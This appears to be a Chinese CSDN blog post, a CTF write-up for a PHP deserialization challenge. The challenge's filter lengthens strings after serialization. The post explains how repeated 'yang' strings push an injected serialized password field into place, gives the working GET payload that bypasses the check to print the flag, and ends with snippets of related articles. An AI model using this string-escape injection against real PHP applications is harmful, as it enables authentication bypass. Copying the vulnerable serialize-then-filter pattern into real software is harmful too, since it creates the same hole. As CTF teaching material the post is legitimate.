cs反序列化2

最新推荐文章于 2022-04-08 21:45:00 发布
最新推荐文章于 2022-04-08 21:45:00 发布
阅读量130 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113353316
版权

cs反序列化2

http://111.229.84.70:9998/

<?php
highlight_file(__FILE__);
class HZNU{
    private $username;
    private $password;
    
    public function __construct($user,$pass){
        $this->username=$user;
        $this->password=$pass;
    }
    
    public function login(){
        if ($this->password==='admin'){
            include 'flag.php';
            echo $flag;
        }
    }
}
function filter($str){
    return str_replace('yang','jiang',$str);//当正则到yang时长度加一
}
$username=$_GET['user'];
$password=$_GET['pass'];
if(preg_match('/admin/',$password)){
    die('你在想屁吃');
}
$a=new HZNU($username,$password);
$s=filter(serialize($a));//序列化a再正则替换
$b=unserialize($s);//再反序列化
$b->login();
?>

get:user和pass两个值,pass不为admin,处理后pass=admin,那么构建反序列化逃逸

private属性序列化之后是这个样子(%00算一个长度)

O:4:"HZNU":2:{s:14:"%00HZNU%00username";s:3:"xxx";s:14:"%00HZNU%00password";s:5:"admin";}

要把后面37个字符挤出去,就需要37个yang

O:4:"HZNU":2:{s:14:"%00HZNU%00username";s:173:"yangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyang";s:14:"%00HZNU%00password";s:5:"admin";}";}

正则替换之后

O:4:"HZNU":2:{s:14:"%00HZNU%00username";s:173:"jiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiang";s:14:"%00HZNU%00password";s:5:"admin";}";}

这样就以假乱真了,所以payload

?user=yangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyang";s:14:"%00HZNU%00password";s:5:"admin";}&pass=666

在这里插入图片描述

切谁怕谁
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
c# CS登录实现(序列化反序列化)LoginProcessVersion1.0
05-09
c# CS登录实现(序列化反序列化)LoginProcessVersion1.0
C# xml序列化和反序列化
01-05
在C#编程中,XML序列化和反序列化是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
cs反序列化4
missht0的博客
01-29 335
cs反序列化4 <?php highlight_file(__FILE__); error_reporting(0); class test{ public $peguin; public $source; public function __construct($file){ $this->source = $file; echo 'welcome to '.$this->source."<br>"; }
来自CS的序列化的类
weixin_30244681的博客
04-30 73
来自CS的序列化的类 usingSystem;usingSystem.Collections.Specialized;usingSystem.Globalization;usingSystem.IO;usingSystem.Runtime.Serialization;usingSystem.Runtime.Serialization...
【Java框架】CSFreamwork:参数序列化
YunSu_CJ的博客
12-27 368
客户端请求资源,如何发送参数? 数据发送,可以是字符串或者字节数据,那么如何发送整型、浮点型、对象等数据。有一种方式是将数据格式化,转换成字符串或字节类型发送,对端接收后,将其还原成源数据。 什么是序列化? 序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。 Gson工具 Gson 是 Google 提供的用来在 Java 对象和 JSON 数据之间进行映射的 Java 类库。可以将一个 JSON 字符串转成一个 Java 对象。 ArgumentMaker 小工具
C# 三种序列化
小小的花园里面挖呀挖呀~
08-25 674
Binary 引用 using System.Runtime.Serialization.Formatters.Binary; \\User.cs [Serializable] public class User { public string UserName { get; set; } public string Password {
C# Xml序列化和反序列化Dictionary
闪耀星星的窝
04-08 1468
做奇门对接时,extendProp字段是一个Map类型 C# 序列化xml时字典类型不支持 ExtendProp.cs using System; using System.Collections.Generic; using System.Xml; using System.Xml.Schema; using System.Xml.Serialization; namespace Qimen.Api { public class ExtendProp : Dictionary<st
ctfshow 反序列化
..
03-07 3288
web254 读代码后发现题目要求传入的值等于类里面的值 ?username=xxxxxx&password=xxxxxx web255 这里的话得有点改变,得让$this->返回的值为true,所以得构造一下链子如下 <?php class ctfShowUser{ public $isVip; public function __construct(){ $this->isVip=true; } } $a=new ctfShowUser()...
CTFshow-WEB入门-反序列化
feng的博客
02-14 5506
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
XML序列化与反序列化 实战
08-16
XML序列化与反序列化是.NET框架中处理数据交换的重要技术,它允许我们将对象的状态转换为XML格式的数据,也可以将XML数据恢复为等效的对象。这个实战项目专注于使用C#实现这一过程,使得开发者能够方便地在XML文件和...
C# 序列化-反序列化.cs
09-06
C# 序列化-反序列化.cs
C# 序列化与反序列化
04-15
在C#编程中,序列化和反序列化是两个关键的概念,它们主要用于数据持久化、网络传输或跨进程通信。序列化是将对象的状态转换为可存储或可传输的形式,而反序列化则是将这种形式的数据恢复为原来的对象。本主题主要...
cs反序列化1
missht0的博客
01-28 98
cs反序列化1 http://111.229.84.70:9997/ 参考:https://www.cnblogs.com/Jim2g/articles/13641685.html llinux命令:https://wenwen.sogou.com/z/q797390881.htm?rcer=g9PEmO6OUhz-HfDog <?php error_reporting(0); highlight_file(__FILE__); class Person{ public $username='
K-means聚类.py ACM比赛常用算法k-means算法
最新发布
07-14
K-means聚类.py ACM比赛常用算法k-means算法
C语言http请求方法.txt
07-13
c
K12教育行业专题研究报告:教育大模型启航,细分领域性能较优(1)
07-14
K12教育行业专题研究报告:教育大模型启航,细分领域性能较优(1)
大学生创业计划书(30)三份资料.doc
07-14
大学生创业计划书(30)三份资料.doc
广岛会议:生成式人工智能进程(英
07-14
广岛会议:生成式人工智能进程(英
大学生创业计划书(23)三篇文件.docx
07-14
大学生创业计划书(23)三篇文件.docx
c# protobuf序列化
09-07
在C#中使用Protobuf进行序列化,您需要遵循以下步骤: 1. 首先,您需要安装Google.Protobuf NuGet包。可以在Visual Studio的NuGet包管理器中搜索并安装该包。 2. 创建您的消息定义文件(.proto文件),用于描述要序列化的数据结构。例如,创建一个名为message.proto的文件,并在其中定义您的消息。例如: ``` syntax = "proto3"; message Person { string name = 1; int32 age = 2; } ``` 3. 使用Protobuf编译器将.proto文件编译为C#类。您可以从Google的官方GitHub存储库(https://github.com/protocolbuffers/protobuf/releases)下载适用于您的操作系统的编译器。然后,在命令提示符下运行以下命令来生成C#类: ``` protoc --csharp_out=. message.proto ``` 这将生成一个名为message.cs的文件,其中包含自动生成的C#类。 4. 在您的C#代码中,使用生成的类来创建和序列化消息对象。首先,确保在代码中导入所需的命名空间: ```csharp using Google.Protobuf; ``` 然后,您可以创建和设置消息对象: ```csharp Person person = new Person { Name = "John Doe", Age = 30 }; ``` 5. 要将消息对象序列化为字节数组,可以使用SerializeToBytes方法: ```csharp byte[] data = person.ToByteArray(); ``` 6. 如果要将字节数组反序列化回消息对象,可以使用解析器类: ```csharp Person deserializedPerson = Person.Parser.ParseFrom(data); ``` 现在,您可以使用deserializedPerson对象访问反序列化后的数据。 这就是使用C#进行Protobuf序列化的基本步骤。请确保在使用Protobuf之前熟悉其更多功能和概念。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值